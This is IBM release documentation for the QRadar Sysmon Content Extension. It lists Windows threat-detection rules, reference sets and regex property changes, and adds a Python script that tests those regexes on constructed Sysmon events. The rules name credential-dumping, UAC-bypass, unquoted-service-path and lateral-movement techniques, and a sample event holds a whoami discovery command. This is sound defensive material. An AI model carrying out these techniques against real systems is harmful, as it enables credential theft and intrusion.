Sysmon
The IBM Security QRadar Sysmon Content Extension detects advanced threats on Windows endpoints by using Sysmon logs.
Sysmon (System Monitor) from Sysinternals is a Windows system service and device driver that records process creation, network connections, file creation, registry changes, driver and image loads, and other activity in its own event log, with a separate Event ID for each activity type. System administrators use these events to monitor system processes, network activity, and files; they give a more detailed view than the standard Windows security logs. For more information about Sysmon, see Secure Your Endpoints With QRadar Content for Sysmon (https://securityintelligence.com/news/secure-your-endpoints-with-qradar-content-for-sysmon/).
This content extension provides multiple use cases to detect advanced threats, such as PowerShell abuse, hidden Windows processes, fileless memory attacks, code obfuscation, and many more. It includes new offense rules, building blocks, reference sets, and custom functions that help you detect these threats.
For more information about the use cases that are covered by this content extension, see the following videos:
Video Title | Video Link |
---|---|
Sysmon PowerShell Use Case 1 | https://youtu.be/PWiw-RpLIbw |
Sysmon PowerShell Use Case 2 | https://youtu.be/_eaMMo8sPtA |
Sysmon PowerShell Use Case 3 | https://youtu.be/sZUAuYpSe7Q |
Sysmon Use Case 4 Bogus Windows Processes | https://youtu.be/gAS-B9gb3RY |
Sysmon Use Case 5 Detecting other Libraries | https://youtu.be/omWnyACNEcM |
Sysmon Use Case 6 Nasty Injection & Encoded Attacks | https://youtu.be/kC2hIJxqF8Q |
QRadar Privilege Escalation Detection Use Case 7 | https://www.youtube.com/watch?v=yitGRL-WJCM |
QRadar Privilege Escalation Continued Use Case 8 | https://www.youtube.com/watch?v=8u6G6SEw3kE |
Sysmon Use Case 9 - More Privilege Escalation Detection | https://www.youtube.com/watch?v=0Wy59Otr_Ag |
Sysmon Use Case 10 - Creating an Admin Account | https://www.youtube.com/watch?v=bJgaFSjuMSs |
Sysmon Detecting Name Pipe Impersonation | https://www.youtube.com/watch?v=pSBQ7NabDUY |
Sysmon Detecting Mimikatz | https://www.youtube.com/watch?v=gKa_CZAz3Jc |
QRadar Lateral Movement Detection, Example One | https://www.youtube.com/watch?v=IBEIN9sl4lk |
QRadar Lateral Movement Detection Example Two | https://www.youtube.com/watch?v=whjpScDYaY4 |
QRadar Lateral Movement Detection Example Three (Plain Windows Features) | https://www.youtube.com/watch?v=7PXzi3pbmFo |
IBM Security QRadar Sysmon
- IBM Security QRadar Sysmon Content Extension 1.3.1
- IBM Security QRadar Sysmon Content Extension 1.3.0
- IBM Security QRadar Sysmon Content Extension 1.2.1
- IBM Security QRadar Sysmon Content Extension 1.2.0
- IBM Security QRadar Sysmon Content Extension 1.1.3
- IBM Security QRadar Sysmon Content Extension 1.1.2
- IBM Security QRadar Sysmon Content Extension 1.1.1
- IBM Security QRadar Sysmon Content Extension 1.1.0
- IBM Security QRadar Sysmon Content Extension 1.0.0
IBM Security QRadar Sysmon Content Extension 1.3.1
The following table shows the updated custom properties in IBM Security QRadar Sysmon Content Extension 1.3.1.
Name | Description |
---|---|
Image | The \bImage:\s.*?\\([^\\]*?)(?:FileVersion|CommandLine):\s expression is now \bImage:\s.*?\\([^\\]*?)\s(?:FileVersion|CommandLine):\s |
IBM Security QRadar Sysmon Content Extension 1.3.0
The Detected a Scheduled Task over Multiple Hosts custom rule received an update to its rule filter. This is a functional change: when multiple commands are run, each one now gets its own offense.
IBM Security QRadar Sysmon Content Extension 1.2.1
The following table shows the updated custom properties in IBM Security QRadar Sysmon Content Extension 1.2.1.
Name | Description |
---|---|
Image | The New Process Name:\s(.*?)Token Elevation Type\: expression is now New Process Name[:\s\\=]*(.*?)\s+(?:Token Elevation Type) |
ShareName | The Share\sName\:\s*(?:\\\\\*\\)(.*)\s\sShare\sPath expression is now Share\sName\:\s*(?:\\\\\*\\)(.*?)\s+Share\sPath |
IBM Security QRadar Sysmon Content Extension 1.2.0
The following table shows the custom properties that are updated in IBM Security QRadar Sysmon Content Extension 1.2.0, one row per changed expression.
Name | Description |
---|---|
Image | The SourceImage\:\s(.*)\sTargetProcessGuid expression is now SourceImage\:\s(.*?)\sTargetProcessGuid |
Image | The Image:\s(.*)\sUser\: expression is now Image:\s(.*?)\sUser\: |
Image | The Image:\s(.*?)\s(FileVersion|CommandLine): expression is now \bImage:\s(.*?)\s(?:FileVersion|CommandLine): |
Image | The New\sProcess\sName:\s*(.*)\s{2}Token\sElevation\sType\: expression is now New Process Name:\s(.*?)Token Elevation Type\: |
Image | The SourceImage\:\s(.*)\sTargetProcessG expression is now SourceImage\:\s.*?\\([^\\]*?)\sTargetProcessG |
ImageName | The Image:\s(?:.*\\)?(.*?)\s(?:FileVersion|CommandLine):\s expression is now \bImage:\s.*?\\([^\\]*?)(?:FileVersion|CommandLine):\s |
ImageName | The Image:\s(?:.*\\)?(.*)\sImageLoaded expression is now Image:.*?\\([^\\]*?)\sImageLoaded |
ImageName | The Image:\s(?:.*\\)?(.*)\sTargetFilename\: expression is now Image:.*?\\([^\\]*?)\sTargetFilename |
ImageName | The Image:\s(?:.*\\)?(.*)\sUser\: expression is now Image:\s.*?\\([^\\]*?)\sUser\: |
ImageName | The Image\:\s(?:.*\\)?(.*)\sTargetObject expression is now Image\:\s.*?\\([^\\]*?)\sTargetObject |
ImageName | The SourceImage\:\s(?:.*\\)?(.*)\sTargetProcessGuid expression is now SourceImage\:\s.*?\\([^\\]*?)\sTargetProcessGuid |
ImageName | The New\sProcess\sName:\s*(?:.*\\)?(.*)\s{2}Token\sElevation\sType\: expression is now New Process Name:\s.*?\\([^\\]*?)Token Elevation Type\: |
Process CommandLine | The Process Command Line:\s(.*)\sToken Elevation Type expression is now Process Command Line[:\s\\=]+(.*?)\s*(?:Token Elevation Type) |
ServiceName | The Service Name\:\s*(.*)\sService\sFile expression is now (?i)Service Name[\:\s\=\\]*(.*?)\s+(?:Service File Name:|&&) |
SourceImage | This custom property is removed from the content extension. |
Some other Image and ImageName expressions are disabled in this version.
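The 1.3.1, 1.2.1 and 1.2.0 tables above change the custom property expressions in two recurring ways: greedy (.*) captures become lazy (.*?), and a \s is added in front of the terminating field name so that the capture no longer ends with whitespace. The following Python script is an illustration added here, not code from the content extension: it runs the expressions listed in those tables against a constructed Sysmon Event ID 1 message and a constructed Windows 4688 message, both flattened onto one line the way a collector forwards them to QRadar, and shows what each capture group returns. The greedy IMAGE_GREEDY pattern and the PROFILED_PROCESS_NAMES set are assumptions made for this example.

```python
import re

# Constructed sample of a Sysmon Event ID 1 (Process Create) message as a
# Windows log collector forwards it to QRadar, with the line breaks of the
# original event collapsed to single spaces. Paths, GUIDs, user and hash are
# made up for this example.
SYSMON_EVENT_1 = (
    "Process Create: RuleName: - UtcTime: 2024-01-15 09:12:33.123 "
    "ProcessGuid: {a1b2c3d4-0001-0002-0003-000000000001} ProcessId: 4412 "
    "Image: C:\\Windows\\System32\\cmd.exe "
    "FileVersion: 10.0.19041.1 (WinBuild.160101.0800) "
    "Description: Windows Command Processor "
    "Product: Microsoft Windows Operating System Company: Microsoft Corporation "
    "OriginalFileName: Cmd.Exe "
    "CommandLine: \"C:\\Windows\\System32\\cmd.exe\" /c whoami /groups "
    "CurrentDirectory: C:\\Users\\alice\\ User: CORP\\alice "
    "LogonGuid: {a1b2c3d4-0001-0002-0003-000000000002} LogonId: 0x3E7F1 "
    "TerminalSessionId: 1 IntegrityLevel: Medium "
    "Hashes: SHA256=0000000000000000000000000000000000000000000000000000000000000000 "
    "ParentProcessGuid: {a1b2c3d4-0001-0002-0003-000000000003} ParentProcessId: 1337 "
    "ParentImage: C:\\Windows\\explorer.exe "
    "ParentCommandLine: C:\\Windows\\Explorer.EXE ParentUser: CORP\\alice"
)

# Constructed Windows Security event 4688 (process creation) in the same
# flattened form, for the Image expression that was changed in 1.2.1.
WINDOWS_EVENT_4688 = (
    "A new process has been created. Creator Subject: Security ID: S-1-5-21-1-2-3-1001 "
    "Account Name: alice Account Domain: CORP Logon ID: 0x3E7F1 "
    "Process Information: New Process ID: 0x113c "
    "New Process Name: C:\\Windows\\System32\\cmd.exe Token Elevation Type: %%1938 "
    "Mandatory Label: S-1-16-8192 Creator Process ID: 0x539 "
    "Creator Process Name: C:\\Windows\\explorer.exe "
    "Process Command Line: \"C:\\Windows\\System32\\cmd.exe\" /c whoami /groups"
)

# Expressions exactly as the release notes list them.
IMAGE_1_2_0 = r"\bImage:\s(.*?)\s(?:FileVersion|CommandLine):"
IMAGENAME_1_2_0 = r"\bImage:\s.*?\\([^\\]*?)(?:FileVersion|CommandLine):\s"
IMAGENAME_1_3_1 = r"\bImage:\s.*?\\([^\\]*?)\s(?:FileVersion|CommandLine):\s"
IMAGE_4688_OLD = r"New Process Name:\s(.*?)Token Elevation Type\:"
IMAGE_4688_1_2_1 = r"New Process Name[:\s\\=]*(.*?)\s+(?:Token Elevation Type)"
# Greedy variant that is NOT on the page; included only to show what the lazy
# quantifier used by the extension avoids.
IMAGE_GREEDY = r"\bImage:\s(.*)\s(?:FileVersion|CommandLine):"

# Constructed stand-in for the Profiled Process Names reference set.
PROFILED_PROCESS_NAMES = {"cmd.exe", "explorer.exe", "svchost.exe"}


def extract(pattern, payload):
    """Return capture group 1 of the first match, as a QRadar custom property would."""
    m = re.search(pattern, payload)
    return m.group(1) if m else None


def in_reference_set(value, reference_set):
    """Exact, case-insensitive membership test, like an alpha-numeric (ignore case)
    reference set. Surrounding whitespace is deliberately NOT stripped, because a
    reference-set test does not strip it either."""
    if value is None:
        return False
    return value.lower() in {v.lower() for v in reference_set}


if __name__ == "__main__":
    for label, pattern in [("Image 1.2.0", IMAGE_1_2_0), ("Image greedy", IMAGE_GREEDY),
                           ("ImageName 1.2.0", IMAGENAME_1_2_0), ("ImageName 1.3.1", IMAGENAME_1_3_1)]:
        print(f"{label:17}: {extract(pattern, SYSMON_EVENT_1)!r}")
    for label, pattern in [("4688 old", IMAGE_4688_OLD), ("4688 1.2.1", IMAGE_4688_1_2_1)]:
        print(f"{label:17}: {extract(pattern, WINDOWS_EVENT_4688)!r}")
    for label, pattern in [("1.2.0", IMAGENAME_1_2_0), ("1.3.1", IMAGENAME_1_3_1)]:
        print(f"ImageName {label} in Profiled Process Names:",
              in_reference_set(extract(pattern, SYSMON_EVENT_1), PROFILED_PROCESS_NAMES))
```

Two things are visible when the script runs. The greedy variant captures everything from the image path through OriginalFileName, because (.*) backtracks to the last CommandLine: field instead of stopping at the first FileVersion: field; the lazy (.*?) the extension uses stops at the first terminator. The 1.2.0 ImageName expression and the old 4688 expression both return the value with a trailing space, and an exact-match reference set test on that value fails, so a rule that checks the extracted name against Profiled Process Names would treat every cmd.exe as unknown; the \s added in 1.3.1 and the \s+ added in 1.2.1 remove that trailing whitespace.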
The following table shows the rules updated in IBM Security QRadar Sysmon Content Extension 1.2.0.
Name | Description |
---|---|
Thread Creation by a Process Launched from a Shared Folder | Now uses the Image custom property instead of the SourceImage custom property. |
The following rules and building blocks are removed in IBM Security QRadar Sysmon Content Extension 1.2.0 because they are duplicates of rules in the IBM Security QRadar Endpoint content extension.
- BB:BehaviorDefinition: Administrative Share Accessed
- Credential Dumping using SAM Registry Key
- Encoded Command Malicious Usage in a Programming Environment
- Fileless UAC Bypass using Fodhelper
- Fileless UAC Bypass using sdclt
- Fileless UAC Bypass using Windows Event Viewer
- Process Launched by an Unusual Process
- Programming Environment Started with a Privileged Account
- Service Configured to Use Powershell
- Suspicious PSExec Module Usage Detected
The Suspicious PSExec Module Usage Detected rule was previously named Metasploit PSExec Module Usage.
The Powershell Malicious Usage Detected rule is removed and replaced by the File Decode or Download followed by Suspicious Activity rule in the IBM Security QRadar Endpoint content extension.
IBM Security QRadar Sysmon Content Extension 1.1.3
The following table shows the custom properties in IBM Security QRadar Sysmon Content Extension 1.1.3.
Name | Optimized | Capture Group | Regex |
---|---|---|---|
Service Name | Yes | 1 | Service Name\:\s*(.*)\sService\sFile |
ServiceFileName | Yes | 1 | Service\sFile\sName\:\s*(.*)\sService\sType |
The following table shows the rules and building blocks in IBM Security QRadar Sysmon Content Extension 1.1.3.
Type | Name | Description |
---|---|---|
Rule | Download via Encoded Command Initiated | This rule triggers when a download of a PowerShell script is initiated from a programming environment such as cmd or PowerShell. |
Rule | Malicious Service Installed | This rule triggers when a service categorized as malicious has been installed. |
Rule | Metasploit PSExec Module Usage | This rule triggers when a usage of the PSExec module is detected. |
Rule | PSExec Process Observed on a Compromised Host | This rule triggers when a PsExec process has been detected on a compromised host. |
Rule | Remote Management Service Connected to lsass Pipe | This rule triggers when a remote management service connects to the lsass pipe. |
Rule | Service Binary Located in a Shared Folder | This rule triggers when a service binary is located in a shared folder. |
Rule | Service Configured to Use a Pipe | This rule triggers when a service is configured to use a pipe. |
Rule | Service Configured to Use Powershell | This rule triggers when a service is configured to use Powershell. |
Rule | Service Installed on a Compromised Host | This rule triggers when a service has been created on a compromised host. |
The following table shows the custom properties, rules, and building blocks that are renamed in IBM Security QRadar Sysmon Content Extension 1.1.3.
Old Name | New Name |
---|---|
A Hidden Network Share Has Been Added | Hidden Network Share Added |
A Malicious Service Has Been Installed in a System | Malicious Service Installed |
A Network Share Has Been Accessed From a Compromised Host | Network Share Accessed from a Compromised Host |
A Network Share Has Been Added In a Compromised Host | Network Share Added to a Compromised Host |
A Pipe Has Been Created Followed by Updating Service Binary Path to Connect to The Created Pipe | Pipe Created Followed by Service Binary Path Update |
a Remoting Service Created a Powershell Script File | Powershell Script Created by a Remote Management Service |
A Scheduled Task Has Been Created in a Compromised Host | Scheduled Task Created on a Compromised Host |
A Service Has Been Installed in a Compromised Host | Service Installed on a Compromised Host |
Abnormal Parent for a System Process | Unusual Parent for a System Process |
An Administrative share Has Been Accessed | Administrative Share Accessed |
An Administrative share Has Been Accessed From a Compromised Machine | Administrative Share Accessed from a Compromised Host |
BB: A Scheduled Task Has Been Created | BB:CategoryDefinition: Scheduled Task Creation |
BB: An Administrative share Has Been Accessed | BB:BehaviorDefinition: Administrative Share Accessed |
BB: CreateRemoteThread Detected | BB:CategoryDefinition: Remote Thread Creation |
BB: CreateRemoteThread excluded cases | BB:BehaviorDefinition: Remote Thread Creation False-Positives |
BB: Detected a Powershell Process | BB:CategoryDefinition: Programming Environment |
BB: Detected a Scheduled Task based on Process Creation Event Part 2 | BB:CategoryDefinition: Scheduled Task Creation by a Process |
BB: Normal Windows Processes Accessed lsass.exe | BB:CategoryDefinition: Processes Allowed to Access lsass |
BB: Pipe Has Been Created | BB:CategoryDefinition: Pipe Creation |
BB: Process created a Network Connection | BB:CategoryDefinition: Network Connection |
BB: PsExec Has Been Detected | BB:BehaviorDefinition: PsExec Process Observed |
BB: Service Binary Path Has Been Set or Updated | BB:BehaviorDefinition: Service Binary Path Set or Update |
Childless Process Launched/Spawned a Process | Process Launched by an Unusual Process |
Command Shell Started With a System Privileges | Programming Environment Started With a Privileged Account |
Detected a Fileless UAC Bypass using Fodhelper | Fileless UAC Bypass using Fodhelper |
Detected a Fileless UAC Bypass using sdclt | Fileless UAC Bypass using sdclt |
Detected a Fileless UAC Bypass using Windows Event Viewer | Fileless UAC Bypass using Windows Event Viewer |
Detected A Known Process Started With A New Unseen Hash | Known Process Started with A Different Hash |
Detected a Long Value in Windows Registry | Unusual Value Size in Windows Registry |
Detected a Malicious Access to lsass Process | Suspicious Access to lsass Process |
Detected a Malicious Access to lsass Process from Unknown Call Trace | Suspicious Access to lsass Process from Unknown Call Trace |
Detected a New Unseen Process Started with a System User Privileges | New Process Started with a Privileged Account |
Detected a Possible Credential Dumping Tool | Potential Credential Dumping Tool Detected |
Detected a Possible Keylogger | Potential Keylogger Detected |
Detected a Remotely Executed Process over Multiple Hosts | Remote Process Execution on Multiple Hosts |
Detected a Remoting Service Connected to Lsass Pipe | Remote Management Service Connected to lsass Pipe |
Detected a Scheduled Task over Multiple Hosts | Scheduled Task Created on Multiple Hosts |
Detected a Service Binary Path Changed followed by a User or Group Added | Service Binary Path Update Followed by User or Group Modification |
Detected a Service Configured to Use a Pipe | Service Configured to Use a Pipe |
Detected a Service Configured to Use Powershell | Service Configured to Use Powershell |
Detected a Service with an Executable Binary Located in a Shared Folder | Service Binary Located in a Shared Folder |
Detected a Suspicious Svchost Process | Suspicious Svchost Process |
Detected Abnormal Parent for a Process | Unusual Parent for a Process |
Detected An Unknown / Unseen Process (Based On The Process Hash) | Unknown Process Hash Observed |
Detected An Unknown / Unseen Process (Based On The Process Name) | Unknown Process Name Observed |
Detected Excessive Execution of SC Command | Excessive Use of SC Command |
Detected Excessive Usage of System Tools From a Single Machine | Excessive System Tools Usage from a Single Host |
Detected Mimikatz Based on IMP Hash | Mimikatz IMP Hash Observed |
Detected PsExec with a Different Process Name | PsExec Process Masquerading |
Excessive Failed Attempts to Access a Network Shared Resource From a Compromised Host | Excessive Network Share Access Failures from a Compromised Host |
Excessive Failed Attempts to Access an Administrative Share From a Single source | Excessive Administrative Share Access Failures from the Same Host |
Lsass Process Connected to a Pipe | Lsass Process Connected to a Pipe |
Metasploit PSExec Module Has Been Detected | Metasploit PSExec Module Usage |
Possible Locky Ransomware detected based on rundll32 with qwerty argument | Rundll32 with qwerty Argument Usage |
Possible UAC Bypass - A Scheduled Task Has Been Configured to Run With Highest Privileges | UAC Bypass - Scheduled Task Configured to Run With Highest Privileges |
Powershell Has Been Launched | Powershell Process Observed |
Powershell Has Been Launched in a Compromised Host | Powershell Process Observed on a Compromised Host |
Powershell Malicious Usage Detected with Encoded Command | Encoded Command Malicious Usage in a Programming Environment |
Powershell Script download with EncodedCommand | Download via Encoded Command Initiated |
Process Baselining: Process Hash | Process Baselining: Process Hash |
Process Baselining: Process Name | Process Baselining: Process Name |
Process Baselining: Process Name to Hash | Process Baselining: Process Name to Hash |
Process Baselining: Process Name to Parent Process | Process Baselining: Process Name to Parent Process |
Process Baselining: Process Started with a System User Privileges | Process Baselining: Process Started with System User Privileges |
Process Created a Thread From a Process That was Launched From a Temp Directory | Thread Creation by a Process Launched From a Temp Directory |
Process Created a Thread Into Another Process | Thread Creation into a Process different from the Initial one |
Process Created a Thread into lsass Process | Thread Creation into lsass Process |
Process Created a Thread into System Process | Thread Creation into a System Process |
Process Launched From a Shared Folder | Process Launched from a Shared Folder |
Process Launched From a Shared Folder and Created Thread into Another Process | Thread Creation by a Process Launched from a Shared Folder |
Process Launched From Temp Directory | Process Launched from a Temp Directory |
Process Loaded Executable from Temp Directory | Executable Loaded from Temp Directory |
Process Started from Unusual Directories (Recycle.bin, ..) | Process Launched from Unusual Directory |
PsExec Has Been Detected | PsExec Process Observed |
PsExec Has Been Launched From a Compromised Host | PsExec Process Observed on a Compromised Host |
SAM Registry key - Enumerate sub-keys (users) | Credential Dumping using SAM Registry Key |
Service Binary Path Has Been Updated Followed by a CreateRemoteThread Detected From the Same Process | Service Binary Path Update Followed by Remote Thread Creation |
Service Binary Path Has Been Updated Followed by a Network Connection From the Same Process | Service Binary Path Update Followed by Network Connection |
Shadow Copies Delete Detected | Shadow Copies Deletion |
System Process Started From Unusual Directory | System Process Launched From Unusual Directory |
Unsigned Driver Has Been Loaded Into Windows Kernel | Unsigned Driver Loaded In Windows Kernel |
Unsigned Executable Loaded Into lsass.exe | Unsigned Executable Loaded In lsass |
Unsigned Executable Loaded Into Sensitive System Process | Unsigned Executable Loaded In Sensitive System Process |
Whoami /groups Has Been Executed | Group or Account Discovery |
IBM Security QRadar Sysmon Content Extension 1.1.2
The following table shows the custom properties in IBM Security QRadar Sysmon Content Extension 1.1.2.
Name | Regex |
---|---|
Image | Image:\s(.*?)\s(FileVersion|CommandLine): |
ImageName | Image:\s(?:.*\\)?(.*?)\s(?:FileVersion|CommandLine):\s |
LoadedImage | ImageLoaded:\s(.*?)\s(FileVersion|Hashes)\: |
LoadedImageName | ImageLoaded\:\s(?:.*\\)(.*?)\s*(FileVersion|Hashes)\: |
The following table shows the rules and building blocks in IBM Security QRadar Sysmon Content Extension 1.1.2.
Name | Description |
---|---|
Process Baselining: Process Name to Hash | Added a rule response to populate the ProcessNametoHashRefMapOfSetKeys reference set. |
Process Baselining: Process Name to Parent Process | Added a rule response to populate the ProcesstoParentProcessPathRefMapKeys reference set. |
Detected A Known Process Started With A New Unseen Hash | Detects when a known process starts with a new unseen hash. |
Detected Abnormal Parent for a Process | Detects an abnormal parent for a process. |
Process Baselining: Process Hash | Provides a baseline for process hashes. |
Process Baselining: Process Name | Provides a baseline for process names, with standard Windows logs or Sysmon logs. |
Detected An Unknown / Unseen Process (Based On The Process Hash) | Detects any unusual or unknown process hashes. |
Detected An Unknown / Unseen Process (Based On The Process Name) | Detects any unusual or unknown process names. |
Process Launched From a Shared Folder and Created Thread into Another Process | Updated one of the rule tests. |
The following table shows the reference data in IBM Security QRadar Sysmon Content Extension 1.1.2.
Type | Name | Description |
---|---|---|
Reference Set | Profiled Process Names | Stores the baseline list of process names. |
Reference Set | Profiled Process Hashes | Stores the baseline list of process hashes. |
Reference Set | ProcessNametoHashRefMapOfSetKeys | Stores the keys used in the map of sets that maps a process name to its hash. |
Reference Set | ProcesstoParentProcessPathRefMapKeys | Stores the keys used in the map of sets that maps a process name to its parent process. |
Reference Map of Sets | ProcessMaptoProcessParentPath | Changed the element type to alpha-numeric ignore case. |
Reference Map of Sets | ProcessNametoHash | Changed the element type to alpha-numeric ignore case. |
The following table shows the saved searches in IBM Security QRadar Sysmon Content Extension 1.1.2.
Name | Description |
---|---|
Unknown Process Hash Has Been Started | Updated the search criteria. |
Abnormal Parent for a Process | Updated the search criteria. |
Unknown Process Name Has Been Started | This search shows unknown processes based on the process name. |
IBM Security QRadar Sysmon Content Extension 1.1.1
This version includes the following content:
- Rule: Detected a Known Process Started With Unseen Hash
- Rule: Detected Abnormal Parent for a Process
- Custom function: checkWithMapOfSets
- Custom function: IsItWhiteListedProcess
IBM Security QRadar Sysmon Content Extension 1.1.0
This version adds use cases to detect the following threats:
- Privilege escalation
- Fileless user account control (UAC) bypasses
- Credential dumping
- Lateral movement techniques
- The Metasploit PSExec implementation
- Malicious PowerShell usage
This version also includes new custom properties, saved searches, and an AQL custom function. A new icon is added to the QRadar admin settings to configure an authorization token for the Sysmon custom functions.
The following table describes the changes that are included in IBM Security QRadar Sysmon Content Extension 1.1.0.
Type | Name | Change description |
---|---|---|
Rule | Unusual Process (ex: word, iexplore, AcroRd..) launched a Command Shell | Detects if an unusual process, such as MS Word, Internet Explorer, Acrobat Reader, starts a command shell or PowerShell. |
Rule | Detected a Remotely Executed Process over Multiple Hosts | Detects a process that is run remotely on multiple hosts by using PowerShell, WMI, or PsExec, which are well-known lateral movement techniques. |
Rule | Detected a Scheduled Task over Multiple Hosts | Detects a scheduled task over multiple hosts. |
Rule | Metasploit PSExec Module Has Been Detected | Detects the Metasploit implementation of the PSExec tool. |
Rule | PSExec Has Been Launched From a Compromised Host | Detects if PsExec is launched from a host that is marked as compromised. |
Rule | PSExec Has Been Detected | Detects if any host launches PSExec. |
Rule | Detected PSExec with a Different Process Name | Detects if PSExec is uploaded with a different name. |
Rule | Command Shell Started With a System Privileges | Detects if a command shell is started with escalated privileges. For example, if a regular user starts the command shell as a Windows System user. |
Rule | Process Baselining: Process Started with a System User Privileges | Provides a baseline for which processes usually start with a system privilege. This baseline is used by other rules to detect if a new process starts with a system privilege. This baseline can indicate whether someone tries to do a privilege escalation. |
Rule | Detected a New Unseen Process Started with a System User Privileges | Detects if a new or unusual process starts with a system privilege. By default this rule is disabled. As part of your maintenance routine, run the process baseline rules for one week before you enable this rule. |
Rule | Process Baselining: Process Name to Parent Process | Provides a baseline to identify the parent processes for each process. This baseline can help to detect unusual processes. |
Rule | Process Baselining: Process Name to Hash | Provides a baseline for process names and their corresponding hashes. This baseline can help to detect if an unknown process starts, or if a process starts with a new hash. This information can also be used to integrate Sysmon logs with other logs. |
Rule | Detected Excessive Usage of System Tools From a Single Machine | Detects excessive use of several system tools from a single host. |
Rule | Detected a Service Configured to Use PowerShell | Detects if any service is configured to use PowerShell. |
Rule | Detected a Long Value in Windows Registry | Detects if an attacker tried to add or set a registry key by using a long value, such as a PowerShell encoded command. |
Rule | Detected a Service with an Executable Binary Located in a Shared Folder | Detects if any service is configured to start an executable binary from a shared folder. |
Rule | Detected a Service Configured to Use a Pipe | Detects if any service is configured to connect to a pipe. |
Rule | A Pipe Has Been Created Followed by Updating Service Binary Path to Connect to The Created Pipe | Detects a named pipe impersonation, which is a technique for privilege escalation. |
Rule | Detected a Service Binary Path Changed followed by a User or Group Added | Detects if a user or group is added after a service binary path changed. |
Rule | Service Binary Path Has Been Updated Followed by a Network Connection From the Same Process | Detects if a process attempts to configure or add a service and detects if the same process creates an outbound connection. |
Rule | Detected Excessive Execution of SC Command | Detects if the service controller command is used excessively. |
Rule | Detected an Unquoted Service Binary Path with Spaces | Detects a service whose binary path is not enclosed in quotation marks and contains spaces. Windows resolves such a path ambiguously at each space, so an attacker who can write to a directory earlier in the path (for example, under C:\Program Files (x86)\) can plant an executable that the service runs instead of the intended binary. |
Rule | Possible UAC Bypass - A Scheduled Task Has Been Configured to Run With Highest Privileges | Detects if a scheduled task is created to run by using the highest privileges. |
Rule | Service Binary Path Has Been Updated Followed by a CreateRemoteThread Detected From the Same Process | Detects if a process attempts to configure or add a service, and detects if the same process creates a thread into other processes. |
Rule | Process Launched From a Shared Folder | Detects if any process starts from a shared folder. |
Rule | Process Launched From a Shared Folder and Created Thread into Another Process | Detect if a process starts from a shared folder and creates a thread in another process. |
Rule | A Remoting Service Created a PowerShell Script File | Detects if any remoting service, such as wsmprovhost, psexesvc, or wmiprvse, creates a PowerShell script file. |
Rule | LSASS Process Connected to a Pipe | Detects if the Local Security Authority Subsystem Service (LSASS) process connects to a named pipe, which can indicate a credential dumping attempt. |
Rule | Detected a Remoting Service Connected to LSASS Pipe | Detects if any remoting service, such as wsmprovhost, psexesvc, or wmiprvse, attempts to connect to a pipe called LSASS. |
Rule | Detected a Fileless UAC Bypass using sdclt | Detects a user account control (UAC) bypass attempt that uses sdclt.exe, the Windows process that allows users to run backup and restore operations. By default, sdclt.exe runs with a high integrity level. After the process starts, it looks for specific keys in the registry. If the keys exist, it runs them. |
Rule | Detected a Fileless UAC Bypass using Fodhelper | Detects if the Fodhelper process is used to bypass UAC in Windows 10 by hijacking a special key in the registry. |
Rule | Detected a Fileless UAC Bypass using Windows Event Viewer | Detects if the Windows event viewer is used to bypass UAC. |
Rule | Unsigned Driver Has Been Loaded Into Windows Kernel | Detects any attempt to load an unsigned driver into the Windows kernel. |
Rule | A Service Has Been Installed in a Compromised Host | Detects any service installation on a host that is marked as a compromised host. |
Rule | A Scheduled Task Has Been Created in a Compromised Host | Detects any attempt to create a scheduled task on a host that is marked as a compromised host. |
Rule | Excessive Denied SMB Traffic From a Compromised Host | Detects excessive SMB traffic that is denied from a compromised host. |
Rule | Excessive Failed Attempts to Access an Administrative Share From a Single source | Detects excessive failed attempts to access administrative shares from a single source host. |
Rule | Excessive Failed Attempts to Access a Network Shared Resource From a Compromised Host | Detects excessive failed attempts to access shared folders over multiple hosts in the network from a compromised host. |
Rule | A Network Share Has Been Accessed From a Compromised Host | Detects if a compromised host successfully accessed a shared folder. |
Rule | A Network Share Has Been Added In a Compromised Host | Detects if a compromised host adds a shared folder or file. |
Rule | Detected SMB Traffic From a Compromised Host Into Other Hosts | Detects outbound SMB traffic from a compromised host to other hosts. |
Rule | Detected a Successful Login From a Compromised Host Into Other Hosts | Detects successful logins from a compromised host to other hosts. |
Rule | An Administrative share Has Been Accessed | Detects if an administrative share is accessed. |
Rule | A Hidden Network Share Has Been Added | Detects the creation of a hidden network share. |
Rule | PowerShell Has Been Launched | Detects if a host starts PowerShell. |
Rule | PowerShell Has Been Launched in a Compromised Host | Detects if a compromised host starts PowerShell. |
Rule | A Malicious Service Has Been Installed in a System | Detects if a known malicious service is installed in the system. |
Rule | Childless Process Launched/Spawned a Process | Detects if a process that is intended to be childless launches a child process. |
Rule | Shadow Copies Delete Detected | Detects if shadow copies are deleted. |
Rule | Detected a Suspicious Svchost Process | Detects a suspicious svchost.exe process. |
Rule | Detected Mimikatz Based on IMP Hash | Detects the Mimikatz post-exploitation tool by its import hash (IMPHASH), which Sysmon records in the Hashes field of the process creation event when IMPHASH is enabled in the HashAlgorithms configuration. |
Rule | A Command Shell or Powershell Has been Launched From a Remote System | Detects if any remoting service, such as wsmprovhost, psexesvc, or wmiprvse, starts a command shell or PowerShell on a remote system. |
Rule | Whoami /groups Has Been Executed | Detects the whoami /groups command, which attackers commonly run to enumerate group membership before attempting a privilege escalation technique. |
Rule | SAM Registry key - Enumerate sub-keys (users) | Detects any attempt to enumerate the SAM registry key. |
Rule | Detected a Registry Dump For SAM or System Key | Detects any attempt to dump the SAM registry. |
Rule | SAM Registry key Has Been Accessed - using regedit | Detects any attempt to access the SAM registry key |
Rule | Process Created a Thread into LSASS Process | Detects any attempt to create a thread into the LSASS process. |
Rule | Unsigned Executable Loaded Into LSASS.exe | Detects any attempt to load an unsigned executable file into the LSASS process. |
Rule | Detected a Malicious Access to LSASS Process | Detects any malicious access to the LSASS process. |
Rule | Detected a Malicious Access to LSASS Process from Unknown Call Trace | Detects any fileless attempts to access the LSASS process. |
Rule | Process Started from Unusual Directories (Recycle.bin, ..) | Detects if a process starts from an unusual directory, such as the recycle bin. |
Rule | Detected a Possible Credential Dumping Tool | Used as an additional indicator when other credential dumping rules match. |
Rule | Detected a Possible Keylogger | Detects if a machine is infected with a keylogger. |
Rule | Possible Locky Ransomware detected based on rundll32 with qwerty argument | Detects a known signature of Locky ransomware. |
Rule | PowerShell Malicious Usage Detected with Encoded Command | Updated to detect more malicious uses of PowerShell. |
Rule | PowerShell Malicious Usage Detected | Updated to detect more malicious uses of PowerShell. |
Building Block | BB: PSExec Has Been Detected | Used in the PSExec rules. |
Building Block | BB: Process created a Network Connection | Used in rules that correlate network connections with other activities. |
